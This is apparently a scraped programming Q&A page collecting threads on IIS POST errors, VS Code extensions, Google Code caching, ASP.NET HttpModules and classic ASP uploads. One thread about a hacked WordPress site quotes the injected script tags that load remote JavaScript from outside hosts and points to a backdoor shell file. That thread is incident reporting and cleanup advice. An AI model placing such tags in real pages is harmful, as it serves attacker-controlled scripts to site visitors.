Post Verb not allowed iis7 - asp.net

I'm trying to implement an upload with progress bar code i found here. But when i run my example code i get the following error in IIS7 Windows7:
Click here for larger image
I tried messing with my handlers but only messed it up more as i don't know what i'm doing. Can someone help me get this working?

It appears that your are trying to upload the file to (or trying to get process update from) a html file (fileupload.html) - now html files are considered as static files by IIS. So you can only issue GET request (there is no point in submitting POST to a static file because the content is not going to change based on POST data) and hence the error.
Perhaps, you have done integration incorrectly or may be using wrong plugin (the author is talking about using it in conjunction with apache module). You may want to look at alternatives from below links:
http://mattberseth.com/blog/2008/07/aspnet_file_upload_with_realti.html
File Upload with progress bar in Asp.Net Mvc/ jQuery?

Related

A Visual Studio Code extension that will send the current file's text to a local HTTP server?

I'm using a live coding environment called Improviz. Essentially it has an output window and a separate editor window. When you type code in the editor and press CTRL+Enter, it evaluates code and updates the output window. The way it does this is by sending the code you've types to an HTTP server running on localhost:3000.
I'd like to use VS Code instead of the bare editor. I don't necessarily care about intellisense, etc. I just want to be able to type code, press CTRL+Enter and have the current file's text be sent to the HTTP server. The server accepts a /read POST request with the code as the content of the request.
I would love to make a proper extension from scratch, but at the moment I'm hoping that there's an extension that I can fork and modify - one that sends the text from the editor to an HTTP server. Does anyone know of such a thing? I suspect there's some other live coding environment that uses this same setup and that maybe there's an extension for it - but I've been digging and can't find this simple extension that I'm imagining already exists.
Thanks for any help.

Script being injected into the top of all my wordpress page

Just noticed ads appearing on one of our Wordpress sites. Nailed it down to these scripts being injected into the top of every page:
<script language="javascript" type="text/javascript" src="http://www.mde86.org/jquery.min.Js"></script><div style="display:none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/18658151.js"></script>
Been looking at all the files and database for hours and can't figure out what is injecting it or how it got there.
What we found so far:
Some random lines in the function.php that were handling posts /
gets. We removed those but that didn't seem to solve the issue.
We found a wordpress user that no one has apparently created. So we removed that.
Reset all passwords on wordpress and FTP access
When we load a copy of the site on our local setup it doesn't display the ads or load the scripts... Almost like it can detect / target the live site?
But we still can't find where or how the script is being injected.
Any help greatly appreciated.
Someone had a similar issue here but unfortunately removed their post so only the cached remains:
http://webcache.googleusercontent.com/search?q=cache:US-HRpncY-QJ:stackoverflow.com/questions/33398784/script-being-injected-into-the-top-of-all-my-wordpress-page+&cd=1&hl=en&ct=clnk&gl=au
The same thing happened to a client of mine in the last 24 hours or so.
Can you share some information about the plugins you use and wordpress version?
The file influencing this is wp-admin/setup-config.php. It has encrypted bash code. I also found two admin users generated in wp_users. I think it's obvious that it's an automated attack, but it's pretty sophisticated.
I found the code on some random website via google search. You can review it here: http://tmp.mongit.com/tools/core.txt - It seems to be a shell file, but I'm not really smart when it comes to websec.
On my client's server I also found crap in a root /tmp/ folder (cPanel) that was being somehow accessed by wp_redirect (referenced in pluggable.php line 1196). These files are holding some MySQL info and WP database queries in JSON format. Not really sure how and why these files exist.
[29-Oct-2015 02:45:59 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/xxx/public_html/wp-admin/setup-config.php(514) : eval()'d code(1) : eval()'d code:2) in /home/xxx/public_html/wp-includes/pluggable.php on line 1196
Try to narrow down the injection source.
Disable plugins one at a time
Switch to a different theme
Check .htaccess files
Test against server generated injections
Test against browser generated injections
had the same issue few hours ago.
Finally found at root wordpress "index.php" at first line injected script calling, the script is calling a file at same directory, the name staretd with .xxxxx like a .htaccess, so it's hidden for example in TCMD.
Cleared the line and deleted the file, now all ok.
But how the hell somebody could control index.pho I don't know....

Project hosting on Google Code. Files are cached?

I do not really understand how Google Code handles file versioning.
I am building a jQuery plugin that anyone can access. Like so:
<script type="text/javascript" src="http://jquery-old-browser-warning.googlecode.com/files/jquery.browser-warning.js"></script>
This script accesses other files on the same project (via ajax).
The problem is, that when I upload a new file, it just seems like there aren't any changed to it. Google recommends that new files should have new names.
But then I would have to change the filenames that the script loads.
But then I would have to change the script file as well, and that would break everybodys implementation (with the script-tag above)
Is there a way to force a file to change when uploading with the same filename?
PS: If I go directly to the project page's file list. Then I do get the file with the updated content. But as I said, not when getting it through ajax.
The cheapest trick in the book to prevent caching is adding some random content to a GET parameter:
www.example.com/resources/resource.js?random=1234567
You can for example use the current timestamp for this.
This, however, causes any and every access to re-fetch the content, and invalidates any client-side caching mechanism as well. I would use this only as a last resort. If Google are that stringent about caching, I'd rather develop a workflow that allows for easy renaming of files.
I don't know your workflow, but maybe you can work with versioned directories?
Like so:
www.example.com/50/resources/resource.js
www.example.com/51/resources/resource.js
that would keep whatever caching the client employs intact, but whenever there's a change from your end, the browser would reload the content.
I think Its just a cache on the browsers, So when you request file from ajax, just add random parameters or version number.
For example, Stackoverflow add version parameter to static contents like
http://sstatic.net/so/all.css?v=6638
Are you talking about uploading files to the "Downloads" area? Those should have distinct filenames, for example they should be versioned. If you're uploading the script code, that should be submitted by the version control system you're using, and should most definitely keep the same name across revisions.
Edit: your code snippet didn't show up on my page, misunderstood what you're trying. Don't imagine Google would be happy with you referencing the SVN repository every time some client page is loaded :)

Using HttpModule to Display Images

I have an HttpModule that displays images that follow a certain URL pattern. For example, /images/employees/jason.jpg is handled by the module, but all other images aren't. It works just fine on my local machine (Cassini and IIS 7). However, the IIS6 production server isn't working. I've had the hosting company map the images to the ASP.NET worker process. Now, all images are showing that they can't render except for the images that should be rendered by the module. They are working correct.
I ran an HttpWatch instance on one of the files and received the following error:
ERROR_HTTP_INVALID_SERVER_RESPONSE
Any ideas?
Final Answer:
The module needed to be updated to transmit server files. So, I added an else to my original if and checked to see if it was an image type (by using a utility method) then use Response.TransmitFile() to pass on the file to the browser.
I then ran into a spacing issue with the images. This was because I forgot that I had .aspx files registered as an image type to perform the testing. So each page would crash during the debug process or add padding that was established from CSS. Doh!
Everything is just peachy now. Thanks to all!
There's doesn't seem to be anything particularly wrong with your module, so the issue must be coming from somewhere else. Have you got security that might be blocking the images? What actually gets returned when you request a static file?
I'd suggest seeing what gets returned (and its headers) using something like firebug to check things like the response code, content type, the actual raw response, etc...
check your web.config IIS6 / IIS7 have different places to add modules and depends on what mode your IIS7 is running in.
http://arcware.net/use-a-single-web-config-for-iis6-and-iis7

Uploading file from web user to server using ASP

I am trying to find out how to upload a file from a web user to a server using an ASP page. The displayed page has an Input tag of type "File" like this:
<input type="file" name="uploadfile">
And a submit button that passes the Form info to another .ASP page. This page must take the path it gets from the Input control and use it to somehow save the file to the server.
I keep thinking there must be a common way to do this, since I see this kind of thing on a number of websites, but how is it done? Is there some sort of server object that can be called for it?
This script will help you.
Also, you may google for "asp upload file" - there are tons of results.
If you are doing any serious uploading or have a commercial product you really need to use a COM component in classic asp. Check out SA-FileUp. It has been the defacto standard for this since like forever.
If your hosting service doesn't allow you to install components, you may also want to look at this script:
http://chris.brimson-read.com.au/index.php?option=com_content&view=article&id=6&Itemid=7
I've seen a wide variety of upload scripts floating around, and they ... vary ... in quality. I've not used the script in the selected answer, but its worth trying a few different options.
I can recommend SA-FileUp and Dundas Upload. They both are easy to install and have good tutorials on how to implement.

Resources